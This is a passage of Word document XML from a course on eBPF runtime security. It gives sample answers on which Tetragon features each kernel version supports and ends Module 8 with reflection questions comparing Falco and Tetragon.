      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production cluster A: Kernel 5.15 (Ubuntu 22.04).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production cluster B: Kernel 5.4 (older distribution).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dev cluster: Kernel 6.1 (Debian 12).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each, what Tetragon functionality can you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CLUSTER A (5.15): Full Tetragon functionality including BPF LSM enforcement. This is the sweet spot — all features available, stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CLUSTER B (5.4): BPF LSM requires 5.7+ — NOT AVAILABLE. You get:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full observability (tracepoints, kprobes work).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kprobe-override enforcement — limited hooks supporting it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NO true BPF LSM enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recommendations for Cluster B:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use Tetragon for observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For enforcement needs, consider Cluster A's model: enforcement requires 5.7+.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plan kernel upgrade — 5.4 is getting old.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CLUSTER C (6.1): Full Tetragon + latest features. Best platform for Tetragon. Newer kernel features (BPF iterators, tokenized maps, etc.) unlock advanced patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.8 Final Reflection Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What's the fundamental architectural difference between Falco and Tetragon?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why does BPF LSM matter for Tetragon's enforcement capability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explain process lineage and why it's central to Tetragon's design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What's the role of TracingPolicy CRDs in making Tetragon Kubernetes-native?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When would you choose Override vs. Signal as an action?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why should enforcement policies roll out in observability mode first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What's the relationship between Tetragon and Cilium? When do they integrate, and when are they independent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How does Tetragon support zero-trust runtime patterns?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When would you run both Falco AND Tetragon?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If explaining Tetragon's value to a security leader in 60 seconds, what would you emphasize?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4"/>
        </w:rPr>
        <w:t xml:space="preserve">— End of Module 8: Tetragon —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The security arc is complete: Module 7 covered Falco's detection, Module 8 covered Tetragon's enforcement. Together they represent the eBPF answer to runtime security.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2026-04-25T01:50:43.259Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-25T01:50:43.260Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>